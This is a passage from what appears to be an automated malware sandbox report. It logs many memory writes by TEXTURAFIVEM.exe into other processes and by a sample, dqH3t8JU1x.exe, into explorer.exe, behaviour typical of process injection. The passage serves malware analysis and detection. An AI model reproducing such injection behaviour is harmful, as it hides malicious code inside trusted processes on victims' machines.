            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4E90000 value: 41Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4EA0000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4EB0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4EC0000 value: 63Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4ED0000 value: 41Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4EF0000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4F00000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4F40000 value: 67Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4F50000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4F60000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4F70000 value: 42Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4F80000 value: 67Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4F90000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4FA0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4FB0000 value: 67Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4FC0000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4FD0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 4FE0000 value: 47Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5070000 value: 67Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5080000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5090000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 50A0000 value: 6DJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 50B0000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 50C0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 50D0000 value: 57Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 50E0000 value: 6DJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5170000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5180000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5190000 value: 6DJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 51A0000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 51B0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 51C0000 value: 61Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 51D0000 value: 6DJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 51E0000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5270000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5280000 value: 6EJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5290000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 52A0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 52B0000 value: 5AJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 52C0000 value: 6EJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 52D0000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 52E0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5370000 value: 6FJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5380000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5390000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 53A0000 value: 43Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 53B0000 value: 6FJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 53C0000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 53D0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 53E0000 value: 6FJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5470000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5480000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5490000 value: 53Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 54A0000 value: 6FJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 54B0000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 54C0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 54D0000 value: 70Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 54E0000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5570000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5580000 value: 53Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5590000 value: 70Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 55A0000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 55B0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 55C0000 value: 73Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 55D0000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 55E0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5670000 value: 53Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5680000 value: 73Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5690000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 56A0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 56B0000 value: 75Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 56C0000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 56D0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 56E0000 value: 47Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5770000 value: 75Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5780000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5790000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 57A0000 value: 77Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 57B0000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 57C0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 57D0000 value: 46Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 57E0000 value: 77Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5870000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5880000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5890000 value: 77Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 58A0000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 58B0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 58C0000 value: 77Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 58D0000 value: 77Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 58E0000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5970000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5980000 value: 77Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5990000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 59A0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 59B0000 value: 73Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 59C0000 value: 77Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 59D0000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 59E0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 24010000 value: 4DJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5A70000 value: 00Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 2200 base: 5A80000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 32D0000 value: 4BJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 32E0000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 32F0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 3380000 value: 4CJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 3390000 value: 4BJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 33A0000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 33B0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 33C0000 value: 47Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 33D0000 value: 4BJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 33E0000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 33F0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 3600000 value: 56Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 3610000 value: 4BJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 3620000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 3630000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 3A20000 value: 56Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 3A30000 value: 4BJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 3A40000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 3A50000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 3A60000 value: 56Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 3A70000 value: 4BJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 3A80000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 3A90000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 3AA0000 value: 61Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 3AB0000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 3AC0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 3AD0000 value: 52Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 3AE0000 value: 61Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 3AF0000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 3B00000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 3B10000 value: 41Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 3B20000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 3B30000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 3B40000 value: 63Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 3B50000 value: 41Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5310000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5320000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5360000 value: 67Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5370000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5380000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5390000 value: 42Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 53A0000 value: 67Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 53B0000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 53C0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5450000 value: 67Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5460000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5470000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5480000 value: 47Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 54A0000 value: 67Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 54B0000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 54C0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 54D0000 value: 6DJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5560000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5570000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5580000 value: 57Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5590000 value: 6DJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 55A0000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 55B0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 55C0000 value: 6DJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 55D0000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5660000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5670000 value: 61Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5680000 value: 6DJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5690000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 56A0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 56B0000 value: 6EJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 56C0000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 56D0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5760000 value: 5AJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5770000 value: 6EJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5780000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5790000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 57A0000 value: 6FJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 57B0000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 57C0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 57D0000 value: 43Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5860000 value: 6FJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5870000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5880000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5890000 value: 6FJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 58A0000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 58B0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 58C0000 value: 53Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 58D0000 value: 6FJump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5960000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5970000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5980000 value: 70Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5990000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 59A0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 59B0000 value: 53Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 59C0000 value: 70Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 59D0000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5A60000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5A70000 value: 73Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5A80000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5A90000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5AA0000 value: 53Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5AB0000 value: 73Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5AC0000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5AD0000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5B60000 value: 75Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5B70000 value: B0Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5B80000 value: 55Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5B90000 value: 47Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5BA0000 value: 75Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5BB0000 value: 90Jump to behavior
            Source: C:\Windows\install\TEXTURAFIVEM.exeMemory written: PID: 1768 base: 5BC0000 value: 55Jump to behavior
            Writes to foreign memory regionsShow sources
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 2990000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 4C00000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 4C20000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 4CB0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 4D40000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 61B0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 61F0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 6280000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 62A0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 62C0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 6550000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 6570000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 6590000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 65C0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7450000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7480000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 64E0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 6500000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 6520000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 6540000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7620000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7640000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7670000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 76A0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 76D0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7420000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7700000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7730000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7760000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 77B0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 77E0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7810000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7470000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7840000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7870000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 78A0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 78E0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7910000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7940000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 7970000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 79A0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 78B0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 75A0000Jump to behavior
            Source: C:\Users\user\Desktop\dqH3t8JU1x.exeMemory written: C:\Windows\explorer.exe base: 75D0000Jump to behavior
